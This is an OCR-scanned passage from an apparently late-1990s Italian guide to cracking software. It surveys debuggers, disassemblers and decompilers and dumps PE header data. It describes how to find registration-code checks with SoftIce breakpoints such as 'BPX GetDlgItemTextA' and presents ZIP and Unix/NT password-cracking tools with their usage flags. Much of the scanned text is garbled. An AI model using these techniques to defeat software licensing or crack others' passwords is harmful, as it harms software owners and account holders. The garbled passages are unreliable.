S di effettuare una scelta ottimale per quanto 
riguarda i tools scelti per eseguire il 
tracing e le altre funzioni. 


Resources list 


Used DLL tree 


Hexadecimal dump Se richiedendo la visualizzazione delle 
Addresses tables funzioni importate vediamo che non compaiono 
Current DLL uses list nella lista quelle come GetDlgItemText o 
GetDlgItemInt dobbiamo supporre che le lettura 


Windows reshow F9 


dei codici di attivazione viene fatta con altri sistemi, 


magari più nascosti 


appositamente. 

L'individuazione del punto dove 
vengono controllati i codici allora 
deve avvenire tramite altre 

ET comexp - General informations funzioni. 
un metodo potrebbe essere quello 
Saosaasszzaoaaszzzonaaszzosaasozsosaassssosassssste 7° VER : 
legato Last update > 30/04/99 all identificazione del numero 
ID delle pile size : 169 472 byte(s) risorse. 
Questo Module type : WINDOWS executable (32 bits) identificatore potremmo 
FileDescription : COM Explorer ottenerlo tramite le funzioni 
di Spy++ (FHeversion PAIA LI a programma attivato oppure 
; LegalCopyright =: Copyright © 1997-1999 4Developers SO dita È 
possiamo \InternalNane : COMEXP cercare di identificare gli ID 
della OriginalFilename : COMEXP.EXE Dialog o degli oggetti della 
Dialog Mipgicttane : COM Explorer z tramite la ricerca tra i dati 
mostrati 
da certi 
programm 
i. “li comexp - Imported functians 
Parlando di @SCANBIN le informazioni FPPottet funetlons + è+VFogrammi \SOPEAD\COMexp. EXE 
riportate sono quelle mostrate  apuap132 194 RegCloseKey 
nell'immagine, relativa al menu, A |ADUAPI32 198 RegCreateKeyExA 
fianco. ADUAPI32 291 RegDeletekeyA 
Slezionando IMPORTED REFERENCES. possiamo  ADVAPI32 266 RegEnumkKeyExA 


ottenere la lista dei riferimenti importati 


dal programma. 


La seguente immagine mostra la tipologia 
delle informazioni inerenti a questa voce. 

Si tratta delle funzioni importate dalle 
proprie del programma e da 


DLL esterne, 


ADUAPI32 269 RegEnumValueA 
ADVAPI32 217 RegOpenKeyExA 
ADVAPI32 225 RegQueryUalueEgA 


ADUAPI32 236 RegSetUalueExA 
CNMLTI 22 48 _Tmanel ict AddMacked 
‘ 


quelle di sistema come ad esempio 
USER32, KERNEL32 ecc. 


fi comexp - DLL used [_ [D{x| 


DLL used : c:\Programmi\COMExp\comexp.exe 


ADUAPI32 
COMCTL32 
COHDLG32 
KERNEL32 
HFC49 
HSUCRT468 
OLE32 
SHELL32 
USER32 
UERSION 


c:\Windows\SYSTEM\ADUVAPI32.DLL 


c:iX\Windows\SYSTEM\COMDLG32.DLL 
c:i\Windows\SYSTEM\KERNEL32.DLL 
c:\Windows\SYSTEM\MFC48.DLL 
c:\Windows\SYSTEM\msvcrt48.dll 
c:\Windows\SYSTEM\0LE32.DLL 
c:i\WindowsY\SYSTEM\SHELL32.DLL 
c:\Windows\SYSTEM\USER32.DLL 
c:i\Windows\SYSTEM\VERSION.DLL 


Lacan 


ciX\Windows\SYSTEM\COMCTL32 DLL] 


Il nome del modulo da cui vengono 
importate è mostrato al fianco. 
Queste informazioni sono quelle 
fondamentali mostrate anche da 
WDASM, SoftIce ecc. 

Moduli legati ai settaggi, tra cui 
serializzazioni dei softwares, 
vengono mostrati anche dall'uso di 
funzioni legate appunto all’uso del 
registro come quelle, casualmente, 
mostrate a fianco (RegCloseKey ecc.) 
SCANBIN mostra in ogni caso quelle 
che lui definisce informazioni 
generalizzate del programma. 

Dal nostro punto di vista non 
contiene informazioni che ci possano 
interessare anche se alcune volte 
potrebbero servirci per vedere se il 
programma è stato riscritto. 


Ci sono stati dei casi in cui le 
informazioni necessarie per la 
serializzazione sono state riscritte 


dentro al programma eseguibile stesso 
ed altre volte invece in file .0CX o 
.DLL che di fatto non erano tali. 


Un altra opzione di menu mostra le 
funzioni esportate. 

Questo tipo di informazioni sono 
presenti soltanto nei moduli DLL o 


similia che esportano le loro funzioni 


verso il mondo esterno. 

Generalmente questa finestra risulta vuota se il programma analizzato è un file 
eseguibile. 

Interessanéete è invece la lista 
delle DLL utilizzate. 


meu e è Pal ES Alcuni programmi come WDASM 
- possiedono breakpoint che bloccano 
il programma quando questo esce dal 
L_[keRNEL32 ] modulo eseguibile per entrare in una 
funzione presente in una DLL 
2 esterna. 

Sapere a priori quali DLL utilizza è 
comunque una cosa comoda in quanto 
a advapi32 ci permette di eseguire delle 
[kerne132 | supposizioni su paramretri che non 
sono puramnte tecnici come ad 

esempio nomi sospetti di DLL. 


La lista delle risorse, come ho 


rene detto prima, mostra le risorse del 
Ea programma visualizzando il nome, se 
. Lula ai Ser 
[kerne132 ] + disponibile, e l'identificatore 
numerico. 


Tra queste risorse sono presenti 
tutte quelle gestite con il resource 
editor del linguaggio di 
programmazione. 

Se un dialog è creata tramite questo allora verrà mostrata in questa finestra. 
Chiaramente deve essere gestita nel programma come risorsa e non creata con 
funzioni dinamiche che creano sull’istante le finestre. 

Le DLL possono essere viste anche come un albero. 

Il nostro programma potrebbe fare riferimento ad una funzione presente in una 
DLL la quale potrebbe riferirsi ad altre funzioni presenti in altre DLL, magari 
di sistema fornite in Windows. 

Una particolare opzione ci permette di cedere l'albero delle chiamate. 

Anche questa visualizzazione potrebbe aiutarci a far mente locale, in altre 
parole a schiarirci le idee anche perchè che crea i sistemi di protezione fà di 
tutto per confondere le persone. 

L'opazione EXADECIMAL DUMP non fa altro se non mostrarci il file in formato 
ESADECIMALE come farebbe HIEW, HEXWORKSHOP, WINHEX ecc. 

Non penso che sia una delle opzioni più utili di SCANBIN. 

Una delle ultime opzioni è quella più complessa ma in molti casi è anche quella 
più utile in quanto ci riferisce informazioni sugli indirizzi ed in particolar 
modo all’header PE ecc. 

La seguente lista mostra sequenzialmente le informazioni mostrate grazie a 
questa opzione. 


Adresses tables : c:\Programmi\COMExp\comexp.exe 


*** MS-DOS header (MH) *** 


00000000 = 5A4D : MS-DOS signature 
0000003C = 0080 : WINDOWS header offset (/MH) 
00000040 = : MS-DOS stub program 


*** PE File *** 
PE File Header 


00000080 = 00004550 : WINDOWS signature 
00000084 = 014C : Machine (Intel 386) 
00000086 = 0006 : NumberOfSections 
00000088 = 3729EE3B : TimeDateStamp 
0000008C = 0000:0000 : PointerToSymbolTable 
00000090 = 00000000 : NumberOfSymbols 
00000094 = 00E0 : SizeOfOptionalHeader 


00000096 010E : Characteristics 


references) 


- File is executable (no unresolved 


- Line nunbers stripped from file 
- Local symbols stripped from file 
- 32 bit word machine 


Magic 
Linker Version 


: Size of Code 

: Size of Initialized Data 

: Size of UnInitialized Data 
: Address of Entry Point 


Base of Code 
Base of Data 
Image Base 


: Section Alignment 


File Alignment 


: Operating System Version 


Image Version 


: Subsystem Version 


(Reserved) 


: Size of Image 
: Size of Headers 


CheckSum 


: SubSystem 


DLL Characteristics 


: Size of Stack Reserve 
: Size of Stack Commit 
: Size of Heap Reserve 
: Size of Heap Commit 


Loader Flags 
Number of Rva And Sizes 


(0)Export Directory 
(1)Import Directory 
(2)Resource Directory 
(3)Exception Directory 
(4)Security Directory 
(5)Base Relocation Table 
(6)Debug Directory 
(7)Description String 
(8)Machine Value (MIPS GP) 
(9)TLS Directory 

(10)Load Configuration Directory 


( 1) 
Physical Address 


: Virtual Address 
: Size of Raw Data 


Pointer to Raw Data 
Characteristics : 

- alignment on 16 bytes 
- contains code 

( 2) 

Physical Address 


: Virtual Address 
: Size of Raw Data 


Pointer to Raw Data 
Characteristics 

- alignment on 16 bytes 

- contains initialized data 
( 3) 


PE Optional Header 
00000098 = 010B 
0000009A = 3.0 
0000009C = 00010A00 
000000A0 = 00018A00 
000000A4 = 00000000 
000000A8 = 000116D0O 
00000G0AC = 00001000 
000000BO = 00012000 
000000B4 = 00400000 
000000B8 = 00001000 
000000BC = 00000200 
000000CO = 4.0 
000000C4 = 0.0 
000000C8 = 4.0 
00000OCC = 00000000 
000000DO = 0002C000 
000000D4 = 00000400 
000000D8 = 00000000 
000000DC = 0002 
000000DE = 0000 
000000E0 = 00100000 
000000E4 = 00001000 
000000E8 = 00100000 
000000EC = 00001000 
000000FO0 = 00000000 
000000F4 = 00000010 
Image Data Directories 
000000F8 = (unused) 
00000100 = 00019000 
00000108 = 0001B000 
00000110 = (unused) 
00000118 = (unused) 
00000120 = 00029000 
00000128 = (unused) 
00000130 = (unused) 
00000138 = (unused) 
00000140 = (unused) 
00000148 = (unused) 
*** Section Headers (number=6) *** 

00000178 = . text 
00000180 = 00010942 
00000184 = 00001000 
00000188 = 00010A00 
0000018C = 00000400 
0000019C = 60000020 
000001A0 = .rdata 
000001A8 = 00004D60 
000001AC = 00012000 
000001B0 = 00004E00 
000001B4 = 00010E00 
000001C4 = 40000040 
000001C8 = .data 
000001DO = 00001FF4 


Physical Address 


external 


000001D4 = 00017000 : Virtual Address 
000001D8 = 00001E00 : Size of Raw Data 
000001DC = 00015C00 : Pointer to Raw Data 
000001EC = (C0000040 : Characteristics 

- alignment on 16 bytes 

- contains initialized data 
000001F0 = .idata : ( 4) 
000001F8 = 000014B6 : Physical Address 
000001FC = 00019000 : Virtual Address 
00000200 = 00001600 : Size of Raw Data 
00000204 = 00017A00 : Pointer to Raw Data 
00000214 = (C0000040 : Characteristics 

- alignment on 16 bytes 

- contains initialized data 
00000218 = .rsrc : ( 5) 
00000220 = ©0000DC9C : Physical Address 
00000224 = 0001B000 : Virtual Address 
00000228 = 0000DE0O0 : Size of Raw Data 
0000022C = 00019000 : Pointer to Raw Data 
0000023C = 40000040 : Characteristics 

- alignment on 16 bytes 

- contains initialized data 
00000240 = .reloc : ( 6) 
00000248 = 0000278E : Physical Address 
0000024C = 00029000 : Virtual Address 
00000250 = 00002800 : Size of Raw Data 
00000254 = 00026E00 : Pointer to Raw Data 
00000264 = 42000040 : Characteristics 


- alignment on 16 bytes 
- contains initialized data 
*** Directories/Sections Locations *** 


00017A00 = .idata : Import Directory 
00019000 = .rsrc : Resource Directory 
00026E00 = .reloc : Base Relocation Table 


Quando si tratta la teoria della programmazione si tende sempre a suddividere il 
tutto in due parti e precisamente nella parte dichiarativa e quella algoritmica. 
Nella prima fase si prende in osservazione il problema e si cerca di ricavarne 
più informazioni possibili giudicate utili od indispensabili per il 
raggiungimento di una finalità. 

La seconda fase è quella in cui questi dati vengono presi e manipolati dalle 
sequenze di istruzioni. 

Nel nostro caso potremmo appunto creare un parallelismo logico con quanto detto 
prima. 

Partiamo dal presupposto che chi scrive moduli destinati alla protezione di 
programmi non crea codice che sia facilmente identificabile per cui individuare 
i punti in cui vengono eseguiti i controlli può essere un compito arduo. 

Una buona analisi iniziale permette di adottare le tecniche più idonee. 
Inizialmente prendete i programmi che permettano di eseguire analisi dei file 
eseguibili e cercate di capire dove si trovano le routines di richiesta codici. 
Se non vi è possibile farlo tramite la ricerca di funzioni quali GetDlgItemText 
e similia cercate i messaggi d’errore del tipo ‘Codice errato’ e cercate di 
identificare dove gli indirizzi di queste stringhe vengono trattate per eseguire 
le stampe. 

Se non riuscite ad identificare niente delle cose precedenti attivate il 
programma e posizionatevi sulla finestra di richiesta del codice. 

Con Spy++ richiedete il numero d’ ID della dialog o dei vari campi d’edit 
utilizzati. 

Se non disponete di Spy++ cercate gli ID con ScanBin ecc. 

Ottenuti questi dati utilizzateli dentro ai debugger. 

SoftIce possiede una vasta gamma di breakpoint che vi permettono d’interrompere 
l’esecuzione del programma per vari motivi. 

Potete intercettare messaggi 


bmsg WM_INITDIALOG 
bmsg WM_PAINT 


Insomma, cercate prima di iniziare il debugging di avere le idee chiare sul tipo 
di tecnica da utilizzare. 

SoftIce è molto potentre ma è necessario sapere bene che cosa si vuole per usare 
in modo appropriato i sui strumenti. 

WDASM è più semplice ed anche meno potente per certe cose ma è più indicato, 
avendo gran parte dei comandi a pulsante, quando si hanno le idee più confuse. 
Un buon programma che nel caso in cui si passi come argomento un file eseguibile 
restituisce un gran numero d’informazioni è QuickView Plus. 

La seguente tabella mostra i tipi di dati visualizzati relativi ad un programma 
eseguibile. 

Ho troncato i dati in quanto sarebbero stati troppi. 

L'importante è rendere l’idea sulla tipologia delle informazioni restituite. 


WINDOWS EXECUTABLE 
32bit for Windows 95 and Windows NT 


Technical File Information: 


Image File Header 


Signature: 00004550 
Machine: Intel 386 
Number of Sections: 0008 
Time Date Stamp: 2a425e19 
Symbols Pointer: 00000000 
Number of Symbols: 00000000 
Size of Optional Header 00e0 
Characteristics: File is executable (i.e. no unresolved external 
references). 
Line numbers stripped from file. 
Local symbols stripped from file. 
Low bytes of machine word are reversed. 
32 bit word machine. 
High bytes of machine word are reversed. 


Image Optional Header 


Magic: 010b 
Linker Version: 2.25 
Size of Code: 00082000 
Size of Initialized Data: 00022800 
Size of Uninitialized Data: 00000000 
Address of Entry Point: 0008ad38 
Base of Code: 00001000 
Base of Data: 0008b000 
Image Base: 00400000 
Section Alignment: 00001000 
File Alignment: 00000200 
Operating System Version: 1.00 
Image Version: 0.00 
Subsystem Version: 4.00 
Reservedi: 00000000 
Size of Image: 000b2000 
Size of Headers: 00000400 
Checksum: 00000000 
Subsystem: Image runs in the Windows GUI subsystem. 
DLL Characteristics: 0000 
Size of Stack Reserve: 00100000 


Size of Stack Commit: 00004000 
Size of Heap Reserve: 00100000 
Size of Heap Commit: 00001000 
Loader Flags: 00000000 
Size of Data Directory: 00000010 
Import Directory Virtual Address: 
Import Directory Size: 23e6 
Resource Directory 
Virtual Address: b000 
Resource Directory Size: 6e00 
Base Relocation Table 
Virtual Address: 3000 
Base Relocation Table Size: 79f4 
TLS Directory Virtual Address: 
TLS Directory Size: 0018 


Import Table 


kernel32.dl1 
OrdinalFunction Name 


0000 DeleteCriticalSection 
0000 LeaveCriticalSection 
0000 EnterCriticalSection 


e000 


2000 


0000 InitializeCriticalSection 


0000 VirtualFree 
0000 VirtualAlloc 


user32.dll 
Ordinal Function Name 


0000 GetKeyboardType 
0000 LoadStringA 
0000 MessageBoxA 


Section Table 


Section name: CODE 
Virtual Size: 00089e14 
Virtual Address: 00001000 
Size of raw data: 0008a000 
Pointer to Raw Data: 00000400 
Pointer to Relocations: 00000000 
Pointer to Line Numbers: 00000000 
Number of Relocations: 0000 
Number of Line Numbers: 0000 


Characteristics: Section contains code 
Section is executable 
Section is readable 


Header Information 


Signature: 5a4d 

Last Page Size: 0050 

Total Pages in File: 0002 
Relocation Items: 0000 
Paragraphs in Header: 0004 
Minimum Extra Paragraphs: 000f 
Maximum Extra Paragraphs: ffff 
Initial Stack Segment: 0000 


Initial Stack Pointer: 00b8 
Complemented Checksum: 0000 
Initial Instruction Pointer: 0000 
Initial Code Segment: 0000 
Relocation Table Offset: 0040 
Overlay Number: 001a 
Reserved: 0000 0000 0000 0000 
0000 0000 0000 0000 
0000 0000 0000 0000 
0000 0000 0000 0000 
Offset to New Header: 00000100 
Memory Needed: 1K 


Le informazioni troncate erano relative alle funzioni esportate le quali sono 
mostrate suddivise per DLL da cui derivano. 

Inoltre ho tagliato le informazioni legate ai segmenti lasciando solo quelle 
relative al CODE segment. 

L'analisi di queste informazioni è il punto di partenza in quanto vedendo le 
funzioni usate permette di capire quali sono i metodi PROBABILMENTE utilizzati 
per certi scopi quali ad esempio la lettura dei codici di registrazione, per la 
comparazione ecc. 

L'identificazione delle funzioni corrette usate per leggere i codici di 
registrazione semplificano la creazione e l’attivazione dei breakpoint adatti 
dove interrompere il codice per analizzare il processo di comparazione. 

Se la tabella precedente vi mostra la presenza di una funzione del tipo 
GetDlgItemTextA, sapendo che questa viene usata per leggere dati da campi 
d’edit, allora potreste usare i comandi per la creazione di breakpoint, di 
SoftIce ad ezsempio, nel seguente modo: 


BPX GetDlgItemTextA 


Questa istruzione bloccherebbe l’esecuzione del programma riportandovi alla 
linea di codice assembler dove è stata fatta la chiamata. 

Da quel punto, eseguendo passo a passo potreste cercare di capire il 
funzionamento della routine. 


TR for Win95 (Shareware version) 
LiuTaoTao in China 
liutt@371.net 
ayliutt@hotmail.com 
http://www.netease.com/-ayliutt 


Un debugger non molto complicato ma abbastanza buono è TRW i quale possiede 
funzioni specifiche per i files PE. 

Un problema di TRW è che le istruzionei sulla pagina WEB sono in cinese. 

Il seguente file reperito su Internet mostra alcune informazioni in inglese tra 
cui ci sono le spiegazioni delle funzioni di TRW. 


Functions done: 
load PE runtime & command line 
hook all API 
load NE at command line, in full-screen DOS window 
set options in TRW.ini 
Ring0 keyboard handler 
asm 
file write 
instance comment 
BPM BPR BPX 
dot command 
load DOS app 
trace DOS app into protect mode 


BPIO 
make PE from memory! 
press hot key Ctrl+L anytime 


Functions will be done: 


show more information about Win95 

add some function like IDA, support IDC 

add some funtion to auto unshell, auto kickdog... 
mouse support 

test mode 

bp message 

heap 


Test Dos Protect Mode app 
1. begin a dos windows in Win95 
2. run TRW in another dos windows 
3. run 'trnewdos' in TRW 
4. in another dos window, run PMODE .EXE 
5. back to TRW, you will find you are at the beginning of the 
DOS program. 
g 342 
t 


g 342 
6. Press <F8> for some times, now enter 16bit protect mode! 
7. 'g 4dd', Press <F8> for some times, now enter 32bit protect mode! 
or just: 


g if cs<100 ;this will run to PM16! 
g if cs!=cs ;try to run to PM32 
g if cs!=cs ;again, and we are in PM32 


Test Make PE from memory 
del newpe.exe 
TRW msg.exe 
MKPE 
PEcompare msg.exe newpe.exe 


or: PESHIELD msg.exe 
PECRYPT msg.exe 
PELOCK msg.exe 


PE?? msg.exe 

del newpe.exe 

TRW msg.exe 
g 4010fd ;this is the entrypoint, I know 
mkpe ;eip will be the new PE's entrypoint 


PEcompare origin _msg.exe newpe.exe 


Always del newpe.exe before 'MKPE', or TRW will append it! 
testi: 
trw msg.exe 
<f8>,<f8>,<f8>.... 


q 


test2: 
trw msg.exe 


g 


test3: 
trw msg.exe 
<f8>,<f8> 
<Alt+Tab> ;Now in Win95 desktop, press <Alt+Tab> again to back 


test4: 


test 5: 


test 6: 


test7: 


test8: 


test9: 


trw ne.exe 
<f8>, <f8> 
g jyou can not 'q' when trace a NE app 


trw msg.exe 
g ord_61 
<f8> some times,back-color of statusline changed means we are 
in critical status. Now <Alt-Tab> is disabled. 


g 


trw msg.exe 
g GetVersion 
pret 
<f8> 


g 


trw msg.exe 
bpx messageboxa 


9g 
bc ;clear all breakpoint 


g 


trw msg.exe 


<f8> 
w cs:eip,eip+70 >dump.txt jwrite mem dump to file 
u cs:eip,eip+20 >asm.txt jwrite unasm output to file 


trw msg.exe 
<f8> 
bpio 21 
r edx 21 
e 401112 ec jin al, dx 
g 40111f ;jbpio will break at 401112 


q 


Test auto change Ring0 & Ring3 keyboard handler: 


HWND 


FKEY 


1. TRW msg.exe 

2. <F8> some times 

3. press <Alt>+<Tab>, now you can change to other task 

because TRW use Ring3 keyboard handler. 

4. g ord_61, After the 'dec ...', you can not press 

<Alt>+<Tab> anymore, because now TRW use Ringo keyboard handler. 
5. g ord _62, press <F8> some time, we back to Ring3 again. 


Commands 


[command] 
display help for all commands, or the given command in detail. 


[HWND] 
Display window handle information. 


[function-key strings] 
Display/Set Function keys 


ex: 
FKEY 
FKEY f10 d 2;U 3:4 
PageIn <address> 
Load the not present page to memory. 
PageIn cs:401000 


Lines [25 | 43 | 50 | 60] 
Set/Display screen lines 
ex: lines 43 


MKPE 
Make a PE program 'newpe.exe' from the memory. 
Always 'del newpe.exe' before 'MKPE', or TRW will append it! 
Current EIP will be the new entrypoint. 


A util in TRW 'PEcompare' can help you compare the origin PE 
and NewPE to test how TRW work. 


PEDUMP 
Dump PE image memory direct to file 'PEDUMP.EXE'. 
You can use G_Rom's MakePE to rebuild a valid PE. 


BPIO port 
BreakPoint on port 1/0 


BPR start_addr end_addr 
BreakPoint on Range access. 


BP [[seg:]address] 

BPX [[seg:]address] 
BreakPoint on Execute 
'BPX offset' when trace a DOS app will ignore segment. 
On tracing a PE thread, this is same as 'BPM X'. 


One-Time BreakPoint commands 
each 'BPXX' command can be replaced as 'G0XX' for a one-time break-point. 
TRW will set this breakpoinnt, go, and clear it. 
gor fs:0 fs:10 
gomd r ds:40000 


BP if condition 
BreakPoint on condition 
bp if eax>=3456787 
bp if dx<543 


go if ah!=34 
go if new section 


RS 
Restore User Screen. (F4). 
In most time, you can Alt+Tab to switch to your APP. 
Ctrl+L or Alt+Tab to return to TRW. 
WC [codewindow_lines] 
Set lines of code window. No parameter will turn it on/off. 
ex: 
wc 25 
WC 
WD [datawindow_lines] 


Set lines of data window. No parameter will turn it on/off. 


ex: 


WMSG - 
Display windows 
messages 
usage: 
WMSG 
[partial-name] 
[WMSG - number] 


DOADZ IDOL 
NODO | 


immane 


DENCACEMON SAD | DOOD 
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Hot Key Ctrl+L 

Most time, 
you can Alt+Tab 
to switch 
betreen your app 
and TRW. 
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was disabled, 
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Ctrl+L to back 
to TRW quickly. 


PPPPFPPF 
nva. 
Services 


TRW provides UNASM (and ASM ?) service to DOS programs. 
Check test1.asm for more. 


Alcune volte il problema è legato al cracking di sistemi zippati. 


Un ottimo password cracker è 


ULTRAZIP PASSWORD CRACKER 
All copyrights to UZPC are owned by Ivan Golubev. 


PasswordCracker riesce a creare in continuazione combinazioni di caratteri che 


vengono usate per 

tentare di decodificare 

file .ZIP protetti da È Ultra Zip Password Cracker v3.60 - pregastered 
password. Tosk Edi Ortone Hop 

Dispone di diversi E|eAj2“£|-p 


metodi selezionabili da 
set up Status [ho task Cunent password nés Password length [- 
Le parole possono Eztimetedl lime [no Averege pps [n° 


essere scelte da UZPC [e] 1598-1999 [van Golubex 
vocabolari, generate 
con condizioni 
(minusole, maiuscole, numeri ecc.) 

Esistono diversi programmi simili a quello appena visto che agiscono su reti e 
la loro finalità è quella di trovare password di sistemi Unix o NT. 

Uno di questi è 


STAR CRACKER Vv1.0b1 
by The SOrCErer 
The_SOrCErEr@mail.dotcom.fr 
http://www.chez.com/thes 


StarCracker esiste per la versione UNIX e per Windows NT. 
Il software si basa su un vocabolario di parole. 

La sintassi è la seguente 

STAR CRACKER v1.0b1 Copyright (c) 1997, The SOrCErEr 


Usage: starcrak <flags> [<password file(s)>] 


Flags: -pwfile:<file>[,..] Set password file(s) 
-single -xingle Turn on single or extended single crack mode 
-wordfile:<file> -stdin Turn on wordlist mode and use <file> or stdin 
-grammar :<rule>[, . .] Set grammar mode to specified grammar rule(s) 
-combination[ :<mode>] Turn on combination mode 
-stats:<new_mode> Make statistics and create file <new_mode>.sta 
-rules -norules Rules for wordlist / No rules for single modes 


-users:<login|uid>[,..] Crack this (these) user(s) only 
-groups:[!]<gid>[,..] Crack users of this (these) group(s) only 
-shells:[!]<shell>[,..] Crack users having this (these) shell(s) only 
-filter:<filter_name> Turn on this words filter 

-timeout -timestep:<m> Set timeout or timestep delay in minutes 


-Stop:<n> -step:<n> Stop/step to next mode after <n> passwds found 
-restore[:<file>] Restore a session 

-show Show cracked passwords from the pwfile(s) 
-beep -quiet Turn on/off beep when a password is guessed 
-test -min:<1> -max:<1> Make a benchmark / Set min or max word length 
-list Display each word tested 

-salt -disp Crack salt by salt / Display current salt 
-noname -nohash Don't use memory for logins or hash tables 


SOFTWARE SPECIALI 


Una menzione deve essere fatta a software particolari. 

Molti linguaggi, Java ad esempio, fino a qualche tempo fa viaggiavano con 
RunTime attaccati per cui si trascinavano dietro gran parte delle informazioni 
simboliche derivanti dai sorgenti originali. 

Spesso SofiIlce e Wdasm mostrano le informazioni con uno stile del tipo 


CALL MyProgram.FUNCTIONCopy 


Quella CALL MyProgram.FUNCTION1I darebbe inizialmente una piccola parvenza di 
‘simbolico’ anche se di fatto non lo è per niente. 

Sucuramente MyProgram non è una stringa dervante da una symbol table ma è 
semplicemente SI che sapendo le rigghe sono nel programma MyProgram, aggiunge 
appunto il nome per dire che la funzione è relativa al programma MyProgram. 
FUNCTION1 invece sarà un nome inventato per semplificare la visualizzazione. 

In altre parole SI o il debugger hanno sostituito un indirizzo con un nome 
simbolico inventato. 

Linguaggi come jAVA, VisualBasic , Clipper ecc. invece portavano gran parte del 
loro codice originario con loro tanto che alcuni programmi potevano 
‘resourcizzare’ (risorgentizzare in italiano) i programmi. 

Precedentemente ho parlato di JAD che riesce a restituire il sorgente JAVA 
partendo da un .class. 

Ormai i programmi Clipper, o almeno certe versioni, sono oggetti da museo per 
cui trattare certi programmi non ne vale la pena. 

Ho trovato recentemente un CD intitolato HACKER che diceva 

“Svelati i misteri dei virus. Conoscere le tecniche riportate sul CD vi 
permetterà di girare tranquillamente su internet senza prendervi più virus.” 

La scritta ideale sarebbe stata 

“Non girate più su internet per prendervi virus. Inserite questo CD è 
prendetevelo direttamente qui.” 


Infatti proprio in un programma intitolato THIEF.EXE che spiega come non 
prendere il virus THIEF è presente un virus. 

Questo per farvi capire l’altissima qualità del prodotto. 

Il CD è stato pubblicato nel 1998 e la versione di WDASM riportata è la 1.2 
(oggi siamo alla 8.9). 

Per farla breve in questo CD sono presenti alcuni disassemblatori per Clipper e 
VisualBasic. 

Tra i decompiler riportati esiste uno per Java scritto in ADA. 

Vi riporto il nome anche se di fatto non l’ho neppure provato dato che fino ad 
ora JAD non ha sbagliato una solo decompilazione. 

Si tratta di 


DECAF 

Gilles Demailly - 100704.2016@compuserve.com 

(this email address and the Decaf Homepage site are provided by friends from 
TeleObjet, please check their home page at 
http://ourworld.compuserve.com/homepages/teleobjet/Homepage.htm) 


L'interesse maggiore sta nel fatto che è stato scritto in ADA ed è fornito con i 
sorgenti. 

Per i teorici universitari in balia di docenti con manie strane (simulatori di 
processori in scheme, riproduzione del concetto di favola in assembler ..) 
potrebbe essere interessante. 

Un altro decompiler è relativo a FOXBASE. 


FOXDCOMP 

A DECOMPILER FOR FOXBASE PROGRAMS 

by Doyle and Associates 

Doyle and Associates 

101 Westminster Road 

Rochester, NY 14607 

Telephone: (716) 461-1148 

Uno dei pochi software strani che dicendo la verità non ho ancora capito bene è 
il seguente. 

Vi riporto il file README da cui potete vedere le potenzialità. 

Vederlo in funzione ha lo stesso stile dei programmi DOS della Borland. 


IDA Version 2.05 
Fidonet: 2:5020/209@fidonet 
Internet: Ilfak_Guilfanov@n209 .f5020.z2.fidonet.org 


Welcome to the First True Interactive Disassembler which allows you 
to explore and modify even compressed executable files ! 


Disassembling for: Intel 8080 
Intel 8085 
Z 80 (not full) 
Intel 8086 
Intel 80286/287 real & protected 
Intel 80386/287 real & protected 
(32-bit processing) 


Interactive mode: YES 

Menu driven mode: YES 

Command language: built-in C-like language 
MultiWindow: YES 

MultiTasking: Background analysis 
Semi-batch mode: YES 

Multisession: YES 

Number of segments: UNLIMITED 


There is a limit on the number of 
contigious non-adjacent memory chunks. 


It is about 170. 


Size of input file: UNLIMITED 
Number of cross-references: UNLIMITED 
AutoComment: BIOS & DOS interrupts 
(comments for all commands are available) 
Max length of one comment: 255 chars 
Number of lines per 
instruction/data 100 
Keyboard redefenition: YES 
Screen colors redefinition: Temporarily not available 
Input file patching: YES 
Output file types: EXE (patched input file) 


COM (patched input file) 
BIN (patched input file) 
ASM (output source code) 
MAP (output MAP file for debugging) 
IDC (IDC program to recreate IDA database) 


Per quanto riguarda il disassemblaggio di CLIPPER 5 potete provare il segeunte 
software. 


Valkyrie 5 DEMO 

Terminal Impact 

2222 Foothill Blvd. #312 

La Canada, CA 91011 USA 

Tel: 818-790-0599 

Fax: 818-790-0699 

BBS: 818-790-0799 

WWW: http://www.terminal-impact.com 


Ci tengo a ripetere che queste, nel presente capitolo, sono solo informazioni 
che voglio riportare per eventualemnte aiutare a reperire certo software a chi 
ne ha bisogno. 

Io personalmente non l’ho provato per cui l’unica cosa che potete fare se vi 
serve è quella di collegarvi sui siti riportati e divertirvi a vostre spese. 
Ora siamo arrivati a VisualBasic. 

Tutto il readme è in tedesco per cui non ho capito se le info seguenti sono 
valide. 


VBDis3 - DER Discompiler fiir Visual Basic 
DoDi 
(MausNet: Hans-Peter Diettrich @ S) 


In un'altra directory del disco compare la versione per VB4. 


VBOpt4 - DoDi's Disassembler for VB4 

(Dr. H.-P. Diettrich) 

CompuServe: 100752,3277 

Internet: 100752.3277@compuserve.com 

WWW: http://ourworld.compuserve.com/homepages/DoDi 


In questo caso le info sono in inglese e sullo stesso si parla anche di VB5. 


Esistono utilities fornite con i sistemi di sviluppo che permettono di svolgere 
alcune funzioni viste con altre utilities. 

Ad esempio LINK.EXE e DUMPBIN.EXE (Visual C++ 32-bit edition) possono essere 
usati per esehuire il dump del portable executable (PE) header di un file 
eseguibile. 

Il segunet è un frammento del dump 


7300 address of entry point 
7000 base of code 
B000 base of data 
----- new ----- 
10000 image base 


Il valore di "image base" di 10000 è l’indirizzo dove il programma inizia nella 
memoria. 

Il valore asociato con "base of code," "base of data," e "address of entry 
point" sono tutti offsets dall’ “image base”. 


Microsoft ogni tanto rilascia delle raccolte di software legate ai suoi prodotti 
e quindi relativi a Windows, linguaggi vari ecc. 

Nell'ultima versione rilasciata è possibile trovare Microsoft Windows System 
Debugger (WDEB386.EXE) il qale è usato per testare e debuggare applicazoni 
Windows, dynamic-link libraries (DLLs), e device driver virtuali (VxDSs). 

É possibile lanciare il system debugger tramite la linea di comando oppure 
specificandolo nel file SYSTEM.INI. 

Prima di partire bisogna seguire i seguenti passi. 


e Connettete un terminale seriale od un altro computer alla porta seriale del 
computer che state debuggando. 

e Create o preparate i symbol files dell’applicazione, DLLs, e VxDs che volete 
debuggare. 


I file simbolici dei driver e delle DLL di sistema sono fornite con il DDK. 

In ogni caso questo tipo di debugger non è decisamente quello che serve per 
compiti come i nostri se non per certi casi legati ad altri tipi di protezioni 
del software come ad esempio chiavi hardware o software che comunque possiedono 
agganci a driver. 


Cool Debugger for Win32 

version : 1.2 

Author : Wei Bao (in chinese : °UÎ°) 

Email : wei.bao@usa.net wei.bao@bj.col.com.cn 


HomePage: http://www.nease.net/-baowei 


PEYiewer E:\Microangelo\muani.exe 


File Edit Debug Tool Help 
>; reno» (3 


Unassemble | TreeView | DumpView | Hesview Debug | 


